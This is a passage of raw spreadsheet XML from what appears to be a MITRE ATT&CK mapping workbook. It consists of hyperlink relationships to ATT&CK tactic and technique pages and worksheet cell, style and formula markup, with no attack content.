Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1007" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1126" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1022" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1190" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1207" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1099" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1177" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1137" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1202" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1194" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1116" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1172" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1122" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence"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1"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="A7" sqref="A7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="20.88671875" style="61" customWidth="1"/>
    <col min="2" max="2" width="19" style="61" customWidth="1"/>
    <col min="3" max="6" width="15.109375" style="61" customWidth="1"/>
    <col min="7" max="10" width="3.77734375" style="61" customWidth="1"/>
    <col min="11" max="11" width="15.6640625" style="61" customWidth="1"/>
    <col min="12" max="12" width="15.109375" style="61" customWidth="1"/>
    <col min="13" max="27" width="3.77734375" style="61" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:42" ht="28.8" x14ac:dyDescent="0.55000000000000004">
      <c r="A1" s="134" t="s">
        <v>200</v>
      </c>
      <c r="B1" s="135"/>
      <c r="C1" s="135"/>
      <c r="D1" s="135"/>
      <c r="E1" s="135"/>
    </row>
    <row r="3" spans="1:42" ht="44.4" x14ac:dyDescent="0.4">
      <c r="A3" s="107" t="s">
        <v>1035</v>
      </c>
      <c r="B3" s="108" t="s">
        <v>1034</v>
      </c>
      <c r="C3" s="109" t="s">
        <v>1036</v>
      </c>
      <c r="D3" s="99"/>
      <c r="E3" s="110" t="s">
        <v>1038</v>
      </c>
      <c r="F3" s="69" t="s">
        <v>1031</v>
      </c>
      <c r="G3" s="150" t="s">
        <v>1033</v>
      </c>
      <c r="H3" s="146"/>
      <c r="I3" s="146"/>
      <c r="J3" s="146"/>
      <c r="K3" s="63" t="s">
        <v>1032</v>
      </c>
      <c r="L3" s="145" t="s">
        <v>1037</v>
      </c>
      <c r="M3" s="146"/>
      <c r="N3" s="151" t="s">
        <v>1039</v>
      </c>
      <c r="O3" s="146"/>
      <c r="P3" s="146"/>
      <c r="Q3" s="146"/>
      <c r="S3" s="146" t="s">
        <v>1616</v>
      </c>
      <c r="T3" s="146"/>
      <c r="U3" s="146"/>
      <c r="V3" s="146"/>
      <c r="W3" s="146"/>
      <c r="AB3" s="148" t="s">
        <v>1615</v>
      </c>
      <c r="AC3" s="148"/>
      <c r="AD3" s="148"/>
      <c r="AE3" s="148"/>
      <c r="AF3" s="149"/>
      <c r="AG3" s="149"/>
      <c r="AH3" s="98"/>
      <c r="AI3" s="98"/>
      <c r="AJ3" s="101"/>
      <c r="AK3" s="101"/>
      <c r="AL3" s="101"/>
      <c r="AM3" s="101"/>
      <c r="AN3" s="102"/>
      <c r="AO3" s="102"/>
      <c r="AP3" s="98"/>
    </row>
    <row r="4" spans="1:42" ht="21.6" thickBot="1" x14ac:dyDescent="0.45">
      <c r="M4" s="73"/>
      <c r="N4" s="73"/>
      <c r="O4" s="73"/>
      <c r="P4" s="73"/>
      <c r="AC4" s="100"/>
      <c r="AD4" s="98"/>
      <c r="AE4" s="101"/>
      <c r="AF4" s="101"/>
      <c r="AG4" s="98"/>
      <c r="AH4" s="98"/>
      <c r="AI4" s="98"/>
      <c r="AJ4" s="101"/>
      <c r="AK4" s="101"/>
      <c r="AL4" s="101"/>
      <c r="AM4" s="101"/>
      <c r="AN4" s="102"/>
      <c r="AO4" s="102"/>
      <c r="AP4" s="98"/>
    </row>
    <row r="5" spans="1:42" ht="36.6" customHeight="1" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A5" s="76" t="s">
        <v>0</v>
      </c>
      <c r="B5" s="77" t="s">
        <v>1</v>
      </c>
      <c r="C5" s="77" t="s">
        <v>2</v>
      </c>
      <c r="D5" s="77" t="s">
        <v>3</v>
      </c>
      <c r="E5" s="77" t="s">
        <v>4</v>
      </c>
      <c r="F5" s="77" t="s">
        <v>237</v>
      </c>
      <c r="G5" s="156" t="s">
        <v>5</v>
      </c>
      <c r="H5" s="157"/>
      <c r="I5" s="157"/>
      <c r="J5" s="157"/>
      <c r="K5" s="158"/>
      <c r="L5" s="77" t="s">
        <v>6</v>
      </c>
      <c r="M5" s="156" t="s">
        <v>7</v>
      </c>
      <c r="N5" s="157"/>
      <c r="O5" s="157"/>
      <c r="P5" s="157"/>
      <c r="Q5" s="158"/>
      <c r="R5" s="152" t="s">
        <v>8</v>
      </c>
      <c r="S5" s="153"/>
      <c r="T5" s="153"/>
      <c r="U5" s="153"/>
      <c r="V5" s="153"/>
      <c r="W5" s="154" t="s">
        <v>196</v>
      </c>
      <c r="X5" s="153"/>
      <c r="Y5" s="153"/>
      <c r="Z5" s="153"/>
      <c r="AA5" s="155"/>
    </row>
    <row r="6" spans="1:42" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="64"/>
      <c r="B6" s="64"/>
      <c r="C6" s="64"/>
      <c r="D6" s="64"/>
      <c r="E6" s="64"/>
      <c r="F6" s="64"/>
      <c r="G6" s="95"/>
      <c r="H6" s="96"/>
      <c r="I6" s="96"/>
      <c r="J6" s="96"/>
      <c r="K6" s="97"/>
      <c r="L6" s="64"/>
      <c r="M6" s="116">
        <f>VALUE(Details!Q4)</f>
        <v>0</v>
      </c>
      <c r="N6" s="117">
        <f>VALUE(Details!R4)</f>
        <v>0</v>
      </c>
      <c r="O6" s="117">
        <f>VALUE(Details!S4)</f>
        <v>0</v>
      </c>
      <c r="P6" s="117">
        <f>VALUE(Details!T4)</f>
        <v>0</v>
      </c>
      <c r="Q6" s="118">
        <f>VALUE(Details!U4)</f>
        <v>0</v>
      </c>
      <c r="R6" s="64"/>
      <c r="S6" s="64"/>
      <c r="T6" s="64"/>
      <c r="U6" s="64"/>
      <c r="V6" s="64"/>
      <c r="W6" s="70"/>
      <c r="X6" s="70"/>
      <c r="Y6" s="70"/>
      <c r="Z6" s="70"/>
      <c r="AA6" s="70"/>
    </row>
    <row r="7" spans="1:42" ht="75" customHeight="1" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A7" s="65" t="s">
        <v>9</v>
      </c>
      <c r="B7" s="66" t="s">
        <v>197</v>
      </c>
      <c r="C7" s="65" t="s">
        <v>44</v>
      </c>
      <c r="D7" s="66" t="s">
        <v>82</v>
      </c>
      <c r="E7" s="66" t="s">
        <v>82</v>
      </c>
      <c r="F7" s="94" t="s">
        <v>113</v>
      </c>
      <c r="G7" s="202" t="s">
        <v>127</v>
      </c>
      <c r="H7" s="203"/>
      <c r="I7" s="203"/>
      <c r="J7" s="203"/>
      <c r="K7" s="204"/>
      <c r="L7" s="78" t="s">
        <v>146</v>
      </c>
      <c r="M7" s="136" t="s">
        <v>157</v>
      </c>
      <c r="N7" s="137"/>
      <c r="O7" s="137"/>
      <c r="P7" s="137"/>
      <c r="Q7" s="138"/>
      <c r="R7" s="160" t="s">
        <v>169</v>
      </c>
      <c r="S7" s="143"/>
      <c r="T7" s="143"/>
      <c r="U7" s="143"/>
      <c r="V7" s="144"/>
      <c r="W7" s="159" t="s">
        <v>178</v>
      </c>
      <c r="X7" s="146"/>
      <c r="Y7" s="146"/>
      <c r="Z7" s="146"/>
      <c r="AA7" s="146"/>
    </row>
    <row r="8" spans="1:42" ht="10.050000000000001" customHeight="1" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A8" s="112"/>
      <c r="B8" s="112"/>
      <c r="C8" s="112"/>
      <c r="D8" s="112"/>
      <c r="E8" s="112"/>
      <c r="F8" s="112"/>
      <c r="G8" s="132"/>
      <c r="H8" s="132"/>
      <c r="I8" s="132"/>
      <c r="J8" s="132"/>
      <c r="K8" s="132"/>
      <c r="L8" s="113"/>
      <c r="M8" s="133"/>
      <c r="N8" s="133"/>
      <c r="O8" s="133"/>
      <c r="P8" s="133"/>
      <c r="Q8" s="133"/>
      <c r="R8" s="115"/>
      <c r="S8" s="115"/>
      <c r="T8" s="115"/>
      <c r="U8" s="115"/>
      <c r="V8" s="115"/>
      <c r="W8" s="112"/>
      <c r="X8" s="114"/>
      <c r="Y8" s="114"/>
      <c r="Z8" s="114"/>
      <c r="AA8" s="114"/>
    </row>
    <row r="9" spans="1:42" ht="19.95" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="65"/>
      <c r="B9" s="66"/>
      <c r="C9" s="65"/>
      <c r="D9" s="66"/>
      <c r="E9" s="66"/>
      <c r="F9" s="65"/>
      <c r="G9" s="129"/>
      <c r="H9" s="130"/>
      <c r="I9" s="130"/>
      <c r="J9" s="130"/>
      <c r="K9" s="131"/>
      <c r="L9" s="94"/>
      <c r="M9" s="116">
        <f>VALUE(Details!Q5)</f>
        <v>0</v>
      </c>
      <c r="N9" s="117">
        <f>VALUE(Details!R5)</f>
        <v>0</v>
      </c>
      <c r="O9" s="117">
        <f>VALUE(Details!S5)</f>
        <v>0</v>
      </c>
      <c r="P9" s="117">
        <f>VALUE(Details!T5)</f>
        <v>0</v>
      </c>
      <c r="Q9" s="118">
        <f>VALUE(Details!U5)</f>
        <v>0</v>
      </c>
      <c r="R9" s="79"/>
      <c r="S9" s="79"/>
      <c r="T9" s="79"/>
      <c r="U9" s="79"/>
      <c r="V9" s="79"/>
      <c r="W9" s="65"/>
      <c r="X9" s="103"/>
      <c r="Y9" s="103"/>
      <c r="Z9" s="103"/>
      <c r="AA9" s="103"/>
    </row>
    <row r="10" spans="1:42" ht="43.8" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A10" s="65" t="s">
        <v>10</v>
      </c>
      <c r="B10" s="66" t="s">
        <v>20</v>
      </c>
      <c r="C10" s="65" t="s">
        <v>45</v>
      </c>
      <c r="D10" s="66" t="s">
        <v>44</v>
      </c>
      <c r="E10" s="66" t="s">
        <v>49</v>
      </c>
      <c r="F10" s="65" t="s">
        <v>114</v>
      </c>
      <c r="G10" s="142" t="s">
        <v>128</v>
      </c>
      <c r="H10" s="143"/>
      <c r="I10" s="143"/>
      <c r="J10" s="143"/>
      <c r="K10" s="144"/>
      <c r="L10" s="94" t="s">
        <v>147</v>
      </c>
      <c r="M10" s="139" t="s">
        <v>158</v>
      </c>
      <c r="N10" s="140"/>
      <c r="O10" s="140"/>
      <c r="P10" s="140"/>
      <c r="Q10" s="141"/>
      <c r="R10" s="160" t="s">
        <v>170</v>
      </c>
      <c r="S10" s="143"/>
      <c r="T10" s="143"/>
      <c r="U10" s="143"/>
      <c r="V10" s="144"/>
      <c r="W10" s="159" t="s">
        <v>179</v>
      </c>
      <c r="X10" s="146"/>
      <c r="Y10" s="146"/>
      <c r="Z10" s="146"/>
      <c r="AA10" s="146"/>
    </row>
    <row r="11" spans="1:42" ht="10.050000000000001" customHeight="1" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A11" s="112"/>
      <c r="B11" s="112"/>
      <c r="C11" s="112"/>
      <c r="D11" s="112"/>
      <c r="E11" s="112"/>
      <c r="F11" s="112"/>
      <c r="G11" s="132"/>
      <c r="H11" s="132"/>
      <c r="I11" s="132"/>
      <c r="J11" s="132"/>
      <c r="K11" s="132"/>
      <c r="L11" s="113"/>
      <c r="M11" s="133"/>
      <c r="N11" s="133"/>
      <c r="O11" s="133"/>
      <c r="P11" s="133"/>
      <c r="Q11" s="133"/>
      <c r="R11" s="115"/>
      <c r="S11" s="115"/>
      <c r="T11" s="115"/>
      <c r="U11" s="115"/>
      <c r="V11" s="115"/>
      <c r="W11" s="112"/>
      <c r="X11" s="114"/>
      <c r="Y11" s="114"/>
      <c r="Z11" s="114"/>
      <c r="AA11" s="114"/>
    </row>
    <row r="12" spans="1:42" x14ac:dyDescent="0.3">
      <c r="A12" s="65"/>
      <c r="B12" s="66"/>
      <c r="C12" s="65"/>
      <c r="D12" s="66"/>
      <c r="E12" s="66"/>
      <c r="F12" s="65"/>
      <c r="G12" s="65"/>
      <c r="H12" s="65"/>
      <c r="I12" s="65"/>
      <c r="J12" s="65"/>
      <c r="K12" s="65"/>
      <c r="L12" s="94"/>
      <c r="M12" s="104"/>
      <c r="N12" s="105"/>
      <c r="O12" s="105"/>
      <c r="P12" s="105"/>
      <c r="Q12" s="106"/>
      <c r="R12" s="79"/>
      <c r="S12" s="79"/>
      <c r="T12" s="79"/>
      <c r="U12" s="79"/>
      <c r="V12" s="79"/>
      <c r="W12" s="65"/>
      <c r="X12" s="103"/>
      <c r="Y12" s="103"/>
      <c r="Z12" s="103"/>
      <c r="AA12" s="103"/>
    </row>
    <row r="13" spans="1:42" ht="43.8" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A13" s="65" t="s">
        <v>11</v>
      </c>
      <c r="B13" s="66" t="s">
        <v>21</v>
      </c>
      <c r="C13" s="65" t="s">
        <v>46</v>
      </c>
      <c r="D13" s="65" t="s">
        <v>45</v>
      </c>
      <c r="E13" s="65" t="s">
        <v>88</v>
      </c>
      <c r="F13" s="65" t="s">
        <v>115</v>
      </c>
      <c r="G13" s="65"/>
      <c r="H13" s="65"/>
      <c r="I13" s="65"/>
      <c r="J13" s="65"/>
      <c r="K13" s="65" t="s">
        <v>129</v>
      </c>
      <c r="L13" s="94" t="s">
        <v>148</v>
      </c>
      <c r="M13" s="139" t="s">
        <v>159</v>
      </c>
      <c r="N13" s="140"/>
      <c r="O13" s="140"/>
      <c r="P13" s="140"/>
      <c r="Q13" s="141"/>
      <c r="R13" s="160" t="s">
        <v>171</v>
      </c>
      <c r="S13" s="143"/>
      <c r="T13" s="143"/>
      <c r="U13" s="143"/>
      <c r="V13" s="144"/>
      <c r="W13" s="159" t="s">
        <v>180</v>
      </c>
      <c r="X13" s="146"/>
      <c r="Y13" s="146"/>
      <c r="Z13" s="146"/>
      <c r="AA13" s="146"/>
    </row>
    <row r="14" spans="1:42" ht="10.050000000000001" customHeight="1" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A14" s="112"/>
      <c r="B14" s="112"/>
      <c r="C14" s="112"/>
      <c r="D14" s="112"/>
      <c r="E14" s="112"/>
      <c r="F14" s="112"/>
      <c r="G14" s="132"/>
      <c r="H14" s="132"/>
      <c r="I14" s="132"/>
      <c r="J14" s="132"/>
      <c r="K14" s="132"/>
      <c r="L14" s="113"/>
      <c r="M14" s="133"/>
      <c r="N14" s="133"/>
      <c r="O14" s="133"/>
      <c r="P14" s="133"/>
      <c r="Q14" s="133"/>
      <c r="R14" s="115"/>
      <c r="S14" s="115"/>
      <c r="T14" s="115"/>
      <c r="U14" s="115"/>
      <c r="V14" s="115"/>
      <c r="W14" s="112"/>
      <c r="X14" s="114"/>
      <c r="Y14" s="114"/>
      <c r="Z14" s="114"/>
      <c r="AA14" s="114"/>
    </row>
    <row r="15" spans="1:42" x14ac:dyDescent="0.3">
      <c r="A15" s="65"/>
      <c r="B15" s="66"/>
      <c r="C15" s="65"/>
      <c r="D15" s="65"/>
      <c r="E15" s="65"/>
      <c r="F15" s="65"/>
      <c r="G15" s="65"/>
      <c r="H15" s="65"/>
      <c r="I15" s="65"/>
      <c r="J15" s="65"/>
      <c r="K15" s="65"/>
      <c r="L15" s="94"/>
      <c r="M15" s="104"/>
      <c r="N15" s="105"/>
      <c r="O15" s="105"/>
      <c r="P15" s="105"/>
      <c r="Q15" s="106"/>
      <c r="R15" s="79"/>
      <c r="S15" s="79"/>
      <c r="T15" s="79"/>
      <c r="U15" s="79"/>
      <c r="V15" s="79"/>
      <c r="W15" s="65"/>
      <c r="X15" s="103"/>
      <c r="Y15" s="103"/>
      <c r="Z15" s="103"/>
      <c r="AA15" s="103"/>
    </row>
    <row r="16" spans="1:42" ht="29.4" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A16" s="66" t="s">
        <v>12</v>
      </c>
      <c r="B16" s="65" t="s">
        <v>22</v>
      </c>
      <c r="C16" s="65" t="s">
        <v>47</v>
      </c>
      <c r="D16" s="65" t="s">
        <v>46</v>
      </c>
      <c r="E16" s="65" t="s">
        <v>83</v>
      </c>
      <c r="F16" s="65" t="s">
        <v>116</v>
      </c>
      <c r="G16" s="65"/>
      <c r="H16" s="65"/>
      <c r="I16" s="65"/>
      <c r="J16" s="65"/>
      <c r="K16" s="65" t="s">
        <v>130</v>
      </c>
      <c r="L16" s="94" t="s">
        <v>63</v>
      </c>
      <c r="M16" s="139" t="s">
        <v>160</v>
      </c>
      <c r="N16" s="140"/>
      <c r="O16" s="140"/>
      <c r="P16" s="140"/>
      <c r="Q16" s="141"/>
      <c r="R16" s="160" t="s">
        <v>172</v>
      </c>
      <c r="S16" s="143"/>
      <c r="T16" s="143"/>
      <c r="U16" s="143"/>
      <c r="V16" s="144"/>
      <c r="W16" s="159" t="s">
        <v>181</v>
      </c>
      <c r="X16" s="146"/>
      <c r="Y16" s="146"/>
      <c r="Z16" s="146"/>
      <c r="AA16" s="146"/>
    </row>
    <row r="17" spans="1:27" ht="10.050000000000001" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" s="112"/>
      <c r="B17" s="112"/>
      <c r="C17" s="112"/>
      <c r="D17" s="112"/>
      <c r="E17" s="112"/>
      <c r="F17" s="112"/>
      <c r="G17" s="132"/>
      <c r="H17" s="132"/>
      <c r="I17" s="132"/>
      <c r="J17" s="132"/>
      <c r="K17" s="132"/>
      <c r="L17" s="113"/>
      <c r="M17" s="133"/>
      <c r="N17" s="133"/>
      <c r="O17" s="133"/>
      <c r="P17" s="133"/>
      <c r="Q17" s="133"/>
      <c r="R17" s="115"/>
      <c r="S17" s="115"/>
      <c r="T17" s="115"/>
      <c r="U17" s="115"/>
      <c r="V17" s="115"/>
      <c r="W17" s="112"/>
      <c r="X17" s="114"/>
      <c r="Y17" s="114"/>
      <c r="Z17" s="114"/>
      <c r="AA17" s="114"/>
    </row>
    <row r="18" spans="1:27" x14ac:dyDescent="0.3">
      <c r="A18" s="66"/>
      <c r="B18" s="65"/>
      <c r="C18" s="65"/>
      <c r="D18" s="65"/>
      <c r="E18" s="65"/>
      <c r="F18" s="65"/>
      <c r="G18" s="65"/>
      <c r="H18" s="65"/>
      <c r="I18" s="65"/>
      <c r="J18" s="65"/>
      <c r="K18" s="65"/>
      <c r="L18" s="94"/>
      <c r="M18" s="103"/>
      <c r="N18" s="103"/>
      <c r="O18" s="103"/>
      <c r="P18" s="103"/>
      <c r="Q18" s="103"/>
      <c r="R18" s="79"/>
      <c r="S18" s="79"/>
      <c r="T18" s="79"/>
      <c r="U18" s="79"/>
      <c r="V18" s="79"/>
      <c r="W18" s="65"/>
      <c r="X18" s="103"/>
      <c r="Y18" s="103"/>
      <c r="Z18" s="103"/>
      <c r="AA18" s="103"/>
    </row>
    <row r="19" spans="1:27" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19" s="65" t="s">
        <v>13</v>
      </c>
      <c r="B19" s="65" t="s">
        <v>23</v>
      </c>
      <c r="C19" s="65" t="s">
        <v>48</v>
      </c>
      <c r="D19" s="65" t="s">
        <v>47</v>
      </c>
      <c r="E19" s="65" t="s">
        <v>19</v>
      </c>
      <c r="F19" s="65" t="s">
        <v>117</v>
      </c>
      <c r="G19" s="65"/>
      <c r="H19" s="65"/>
      <c r="I19" s="65"/>
      <c r="J19" s="65"/>
      <c r="K19" s="65" t="s">
        <v>131</v>
      </c>
      <c r="L19" s="94" t="s">
        <v>149</v>
      </c>
      <c r="M19" s="147" t="s">
        <v>161</v>
      </c>
      <c r="N19" s="147"/>
      <c r="O19" s="147"/>
      <c r="P19" s="147"/>
      <c r="Q19" s="147"/>
      <c r="R19" s="143" t="s">
        <v>173</v>
      </c>
      <c r="S19" s="143"/>
      <c r="T19" s="143"/>
      <c r="U19" s="143"/>
      <c r="V19" s="144"/>
      <c r="W19" s="159" t="s">
        <v>182</v>
      </c>
      <c r="X19" s="146"/>
      <c r="Y19" s="146"/>
      <c r="Z19" s="146"/>
      <c r="AA19" s="146"/>
    </row>
    <row r="20" spans="1:27" ht="10.050000000000001" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" s="112"/>
      <c r="B20" s="112"/>
      <c r="C20" s="112"/>
      <c r="D20" s="112"/>
      <c r="E20" s="112"/>
      <c r="F20" s="112"/>
      <c r="G20" s="132"/>
      <c r="H20" s="132"/>
      <c r="I20" s="132"/>
      <c r="J20" s="132"/>
      <c r="K20" s="132"/>
      <c r="L20" s="113"/>
      <c r="M20" s="133"/>
      <c r="N20" s="133"/>
      <c r="O20" s="133"/>
      <c r="P20" s="133"/>
      <c r="Q20" s="133"/>
      <c r="R20" s="115"/>
      <c r="S20" s="115"/>
      <c r="T20" s="115"/>
      <c r="U20" s="115"/>
      <c r="V20" s="115"/>
      <c r="W20" s="112"/>
      <c r="X20" s="114"/>
      <c r="Y20" s="114"/>
      <c r="Z20" s="114"/>
      <c r="AA20" s="114"/>
    </row>
    <row r="21" spans="1:27" x14ac:dyDescent="0.3">
      <c r="A21" s="65"/>
      <c r="B21" s="65"/>
      <c r="C21" s="65"/>
      <c r="D21" s="65"/>
      <c r="E21" s="65"/>
      <c r="F21" s="65"/>
      <c r="G21" s="65"/>
      <c r="H21" s="65"/>
      <c r="I21" s="65"/>
      <c r="J21" s="65"/>
      <c r="K21" s="65"/>
      <c r="L21" s="94"/>
      <c r="M21" s="103"/>
      <c r="N21" s="103"/>
      <c r="O21" s="103"/>
      <c r="P21" s="103"/>
      <c r="Q21" s="103"/>
      <c r="R21" s="79"/>
      <c r="S21" s="79"/>
      <c r="T21" s="79"/>
      <c r="U21" s="79"/>
      <c r="V21" s="79"/>
      <c r="W21" s="65"/>
      <c r="X21" s="103"/>
      <c r="Y21" s="103"/>
      <c r="Z21" s="103"/>
      <c r="AA21" s="103"/>
    </row>
    <row r="22" spans="1:27" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A22" s="65" t="s">
        <v>14</v>
      </c>
      <c r="B22" s="65" t="s">
        <v>24</v>
      </c>
      <c r="C22" s="65" t="s">
        <v>49</v>
      </c>
      <c r="D22" s="65" t="s">
        <v>83</v>
      </c>
      <c r="E22" s="65" t="s">
        <v>89</v>
      </c>
      <c r="F22" s="65" t="s">
        <v>118</v>
      </c>
      <c r="G22" s="65"/>
      <c r="H22" s="65"/>
      <c r="I22" s="65"/>
      <c r="J22" s="65"/>
      <c r="K22" s="65" t="s">
        <v>132</v>
      </c>
      <c r="L22" s="94" t="s">
        <v>150</v>
      </c>
      <c r="M22" s="147" t="s">
        <v>162</v>
      </c>
      <c r="N22" s="147"/>
      <c r="O22" s="147"/>
      <c r="P22" s="147"/>
      <c r="Q22" s="147"/>
      <c r="R22" s="143" t="s">
        <v>174</v>
      </c>
      <c r="S22" s="143"/>
      <c r="T22" s="143"/>
      <c r="U22" s="143"/>
      <c r="V22" s="144"/>
      <c r="W22" s="159" t="s">
        <v>183</v>
      </c>
      <c r="X22" s="146"/>
      <c r="Y22" s="146"/>
      <c r="Z22" s="146"/>
      <c r="AA22" s="146"/>
    </row>
    <row r="23" spans="1:27" ht="10.050000000000001" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="112"/>
      <c r="B23" s="112"/>
      <c r="C23" s="112"/>
      <c r="D23" s="112"/>
      <c r="E23" s="112"/>
      <c r="F23" s="112"/>
      <c r="G23" s="132"/>
      <c r="H23" s="132"/>
      <c r="I23" s="132"/>
      <c r="J23" s="132"/>
      <c r="K23" s="132"/>
      <c r="L23" s="113"/>
      <c r="M23" s="133"/>
      <c r="N23" s="133"/>
      <c r="O23" s="133"/>
      <c r="P23" s="133"/>
      <c r="Q23" s="133"/>
      <c r="R23" s="115"/>
      <c r="S23" s="115"/>
      <c r="T23" s="115"/>
      <c r="U23" s="115"/>
      <c r="V23" s="115"/>
      <c r="W23" s="112"/>
      <c r="X23" s="114"/>
      <c r="Y23" s="114"/>
      <c r="Z23" s="114"/>
      <c r="AA23" s="114"/>
    </row>
    <row r="24" spans="1:27" x14ac:dyDescent="0.3">
      <c r="A24" s="65"/>
      <c r="B24" s="65"/>
      <c r="C24" s="65"/>
      <c r="D24" s="65"/>
      <c r="E24" s="65"/>
